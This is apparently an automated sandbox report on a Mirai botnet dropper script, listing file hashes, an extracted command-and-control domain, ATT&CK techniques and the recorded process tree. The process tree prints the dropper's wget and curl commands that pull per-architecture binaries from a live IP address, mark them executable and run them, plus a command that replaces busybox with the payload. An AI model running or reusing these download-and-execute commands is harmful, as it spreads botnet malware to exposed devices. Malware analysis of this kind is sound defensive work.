mirai | 7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
26/03/2025, 10:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh
Size

1KB
MD5

5cb03410e968d6258f8669e638e42d3f
SHA1

3c2579d5ef3fad9a1ef89f07f9d5729c03c6a9ff
SHA256

7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74
SHA512

781c81b67d13cef074b95d8f3c06baca6242fb2ba788c32b01dd6c59398df5b9282be2b932c0d5e4b480570e001a080a125ba786d77bca2fd682aad33dbb14c4

Score

10^/10

mirai botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

anti.linkpc.net

Extracted

Family

mirai

anti.linkpc.net

Extracted

Family

mirai

anti.linkpc.net

Extracted

Family

mirai

anti.linkpc.net

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (29173) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 9 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
737	chmod
745	sh
749	chmod
819	chmod
851	chmod
857	chmod
743	chmod
797	chmod
809	chmod

Executes dropped EXE 7 IoCs

ioc	pid	Process
/tmp/RUN	738	7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh
/tmp/RUN	744	7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh
/tmp/RUN	798	7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh
/tmp/RUN	810	7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh
/tmp/RUN	821	7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh
/tmp/RUN	852	7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh
/tmp/RUN	858	7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	/bin/busybox	744	RUN

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/22/cmdline	RUN
File opened for reading	/proc/72/cmdline	RUN
File opened for reading	/proc/520/cmdline	RUN
File opened for reading	/proc/698/cmdline	RUN
File opened for reading	/proc/807/cmdline	RUN
File opened for reading	/proc/373/cmdline	RUN
File opened for reading	/proc/21/cmdline	RUN
File opened for reading	/proc/24/cmdline	RUN
File opened for reading	/proc/73/cmdline	RUN
File opened for reading	/proc/76/cmdline	RUN
File opened for reading	/proc/105/cmdline	RUN
File opened for reading	/proc/319/cmdline	RUN
File opened for reading	/proc/812/cmdline	RUN
File opened for reading	/proc/374/cmdline	RUN
File opened for reading	/proc/115/cmdline	RUN
File opened for reading	/proc/149/cmdline	RUN
File opened for reading	/proc/20/cmdline	RUN
File opened for reading	/proc/71/cmdline	RUN
File opened for reading	/proc/386/cmdline	RUN
File opened for reading	/proc/472/cmdline	RUN
File opened for reading	/proc/5/cmdline	RUN
File opened for reading	/proc/733/cmdline	RUN
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/7/cmdline	RUN
File opened for reading	/proc/69/cmdline	RUN
File opened for reading	/proc/317/cmdline	RUN
File opened for reading	/proc/487/cmdline	RUN
File opened for reading	/proc/705/cmdline	RUN
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/832/cmdline	RUN
File opened for reading	/proc/3/cmdline	RUN
File opened for reading	/proc/6/cmdline	RUN
File opened for reading	/proc/37/cmdline	RUN
File opened for reading	/proc/324/cmdline	RUN
File opened for reading	/proc/402/cmdline	RUN
File opened for reading	/proc/683/cmdline	RUN
File opened for reading	/proc/714/cmdline	RUN
File opened for reading	/proc/788/cmdline	RUN
File opened for reading	/proc/12/cmdline	RUN
File opened for reading	/proc/13/cmdline	RUN
File opened for reading	/proc/116/cmdline	RUN
File opened for reading	/proc/320/cmdline	RUN
File opened for reading	/proc/753/cmdline	RUN
File opened for reading	/proc/769/cmdline	RUN
File opened for reading	/proc/824/cmdline	RUN
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/8/cmdline	RUN
File opened for reading	/proc/15/cmdline	RUN
File opened for reading	/proc/699/cmdline	RUN
File opened for reading	/proc/229/cmdline	RUN
File opened for reading	/proc/9/cmdline	RUN
File opened for reading	/proc/11/cmdline	RUN
File opened for reading	/proc/17/cmdline	RUN
File opened for reading	/proc/23/cmdline	RUN
File opened for reading	/proc/74/cmdline	RUN
File opened for reading	/proc/78/cmdline	RUN
File opened for reading	/proc/752/cmdline	RUN
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/19/cmdline	RUN
File opened for reading	/proc/708/cmdline	RUN
File opened for reading	/proc/838/cmdline	RUN
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/2/cmdline	RUN
File opened for reading	/proc/18/cmdline	RUN

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
742	cat
740	wget
741	curl

Writes file to tmp directory 15 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/mips	curl
File opened for modification	/tmp/mpsl	wget
File opened for modification	/tmp/arm5	wget
File opened for modification	/tmp/arm5	curl
File opened for modification	/tmp/x86	wget
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/bin/busybox	sh
File opened for modification	/tmp/x86_64	curl
File opened for modification	/tmp/mpsl	curl
File opened for modification	/tmp/x86	curl
File opened for modification	/tmp/arm	curl
File opened for modification	/tmp/arc	curl
File opened for modification	/tmp/x86_64	wget
File opened for modification	/tmp/arm	wget
File opened for modification	/tmp/RUN	7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh

/tmp/7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh
/tmp/7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:706
- /usr/bin/wget
  wget http://103.77.246.176/x86
  2⤵
  - Writes file to tmp directory
  PID:709
- /usr/bin/curl
  curl -O http://103.77.246.176/x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:731
- /bin/cat
  cat x86
  2⤵
  PID:736
- /bin/chmod
  chmod +x 7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh RUN systemd-private-a2e7d5acfbb942e5ade51a566385727f-systemd-timedated.service-Lx863V x86
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/RUN
  ./RUN
  2⤵
  PID:738
- /usr/bin/wget
  wget http://103.77.246.176/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:740
- /usr/bin/curl
  curl -O http://103.77.246.176/mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:741
- /bin/cat
  cat mips
  2⤵
  - System Network Configuration Discovery
  PID:742
- /bin/chmod
  chmod +x 7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh mips RUN systemd-private-a2e7d5acfbb942e5ade51a566385727f-systemd-timedated.service-Lx863V x86
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/RUN
  ./RUN
  2⤵
  - Changes its process name
  - Reads runtime system information
  PID:744
- - /bin/sh
    sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv ./RUN bin/busybox; chmod 777 bin/busybox"
    3⤵
    - File and Directory Permissions Modification
    - Writes file to tmp directory
    PID:745
  - - /bin/rm
      rm -rf bin/busybox
      4⤵
      PID:746
  - - /bin/mkdir
      mkdir bin
      4⤵
      PID:747
  - - /bin/mv
      mv ./RUN bin/busybox
      4⤵
      Reads runtime system information
      PID:748
  - - /bin/chmod
      chmod 777 bin/busybox
      4⤵
      File and Directory Permissions Modification
      PID:749
- /usr/bin/wget
  wget http://103.77.246.176/arc
  2⤵
  PID:753
- /usr/bin/curl
  curl -O http://103.77.246.176/arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:754
- /bin/cat
  cat arc
  2⤵
  PID:796
- /bin/chmod
  chmod +x 7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh arc bin mips RUN x86
  2⤵
  - File and Directory Permissions Modification
  PID:797
- /tmp/RUN
  ./RUN
  2⤵
  PID:798
- /usr/bin/wget
  wget http://103.77.246.176/x86_64
  2⤵
  - Writes file to tmp directory
  PID:799
- /usr/bin/curl
  curl -O http://103.77.246.176/x86_64
  2⤵
  - Writes file to tmp directory
  PID:807
- /bin/cat
  cat x86_64
  2⤵
  PID:808
- /bin/chmod
  chmod +x 7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh arc bin mips RUN x86 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:809
- /tmp/RUN
  ./RUN
  2⤵
  PID:810
- /usr/bin/wget
  wget http://103.77.246.176/mpsl
  2⤵
  - Writes file to tmp directory
  PID:812
- /usr/bin/curl
  curl -O http://103.77.246.176/mpsl
  2⤵
  - Writes file to tmp directory
  PID:813
- /bin/cat
  cat mpsl
  2⤵
  PID:818
- /bin/chmod
  chmod +x 7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh arc bin mips mpsl RUN x86 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/RUN
  ./RUN
  2⤵
  PID:821
- /usr/bin/wget
  wget http://103.77.246.176/arm
  2⤵
  - Writes file to tmp directory
  PID:824
- /usr/bin/curl
  curl -O http://103.77.246.176/arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:838
- /bin/cat
  cat arm
  2⤵
  PID:850
- /bin/chmod
  chmod +x 7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh arc arm bin mips mpsl RUN x86 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:851
- /tmp/RUN
  ./RUN
  2⤵
  PID:852
- /usr/bin/wget
  wget http://103.77.246.176/arm5
  2⤵
  - Writes file to tmp directory
  PID:854
- /usr/bin/curl
  curl -O http://103.77.246.176/arm5
  2⤵
  - Writes file to tmp directory
  PID:855
- /bin/cat
  cat arm5
  2⤵
  PID:856
- /bin/chmod
  chmod +x 7b707f877544b367864e3dbb19e79c811b4464ba2f86c72b728b118874294c74.sh arc arm arm5 bin mips mpsl RUN x86 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:857
- /tmp/RUN
  ./RUN
  2⤵
  PID:858
- /usr/bin/wget
  wget http://103.77.246.176/arm6
  2⤵
  PID:860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/RUN

Filesize
65KB

MD5
a12e0678b004e8fd4a2f5de7238fa547

SHA1
fe94bb4c3ba1fdf34a5d4d71115ace03ab6dbb3d

SHA256
7d1f4d7cc6d14f38a5670474f3ba70b853794b990a8441fcc3c62a61699a291d

SHA512
8c5df6067255c095ed179c465024da06af3665090d860a6db25de251b07155297f64a4921837ccf08e2ed1eb45619d6f20d7aae6c469058517967c52f3746107

Download Submit
/tmp/arc

Filesize
201B

MD5
154506d20dcd8502b3820a2912b697e9

SHA1
55c207a1c0aeabc6df6d0307f11a03137139d701

SHA256
5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c

SHA512
aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

Download Submit
/tmp/arm

Filesize
65KB

MD5
b5aa886296a761ab0bd2bd107cb035ae

SHA1
ddb750a7a0b2d33967c9e5e30cfa191e1fe699ef

SHA256
faaf06af3236af81d25c5f13c136b9aee70fb586d66143ab5f7dacdf0870e473

SHA512
9b651b7ccb348237b3cd537f4944a37684af3fe0f209427f3049ad36238eef167c023448972d80ab2efdc0cbc9a82915dcdd09a7d79336a3fe225dff161b6693

Download Submit
/tmp/arm5

Filesize
39KB

MD5
2ac46642238ffcfeab959f97869d9bfc

SHA1
1d3fba167832a986bda046f8765284114e4cb7cd

SHA256
eb2918b74b0359a196f2046e189303421391b74b65faadbe74ba049e80cb463c

SHA512
ed710b2f9db047440f6d07ff6ac61d114e2dbf016f7284fe400c31a831e4524b8b1835e53d13dd35dafad21314b2aa7fccf595f546a8f9877af3ffffed80c438

Download Submit
/tmp/mips

Filesize
82KB

MD5
928a6896fd79a015fc0211b332a3b29e

SHA1
2e8aea744befb98c459cbe119d14dd90cd742b2d

SHA256
d2d6f02951bd1e204406338acc0b233f41a86514fee55f2603abcf817d54a3f0

SHA512
e367b80790642ad300a057e40ebcc7391ad5eebfb9c1dbe5644883110c5b6a55d785ad77acfd3e1172b6c9628238feb29d87535902c0fd9fb56a7747c882781c

Download Submit
/tmp/mpsl

Filesize
82KB

MD5
24e5cf215aa9afc5928beca2c03d606c

SHA1
f7f163f7d4f086c432cae78adffefe4df50a8139

SHA256
80cb6911736c562cbfaecce3add2ceaeffdc41926cb45a9600d13a96b37857c0

SHA512
92bb363df5210d08d7df1a977044fc320136916c228408fe81e33218a08f3023586bb80acc4aaceb459d4248b55468134d66f53cb6d519f72fd666af1a569bd3

Download Submit
/tmp/x86

Filesize
54KB

MD5
992c31ecc9139b95d73cc50b1d423fe3

SHA1
0a409090f87f3c51bbc647db8e6e53da85428ef4

SHA256
8145e850af71d1b6b53236188eabca89336cebc2748d50e4c54c9f190f74acd3

SHA512
9ea91cffc8aa2daba283dca80a9cc84d3c9f07b70f0af26f1a1b11981eae69c2e5bb00d16dea62e9a9db912a310d6aee049901a1113454a6905f35cd97baa438

Download Submit
/tmp/x86_64

Filesize
61KB

MD5
74ff8836102dc071a6d68254f52eb8a0

SHA1
5381abe66281268cd8dfad51934e687649b1609f

SHA256
21edfc97a23615194750a6d3479925b120c3af92003975832c743b9b659cac53

SHA512
cd40f3f947cb2edd78e69dfdf2f9ad352abaedddb5dc561b05e37543abf15b32e6cf22ee637c6099dca808dce722e054d633f4a0fc461a10f70390eee6865b8e

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads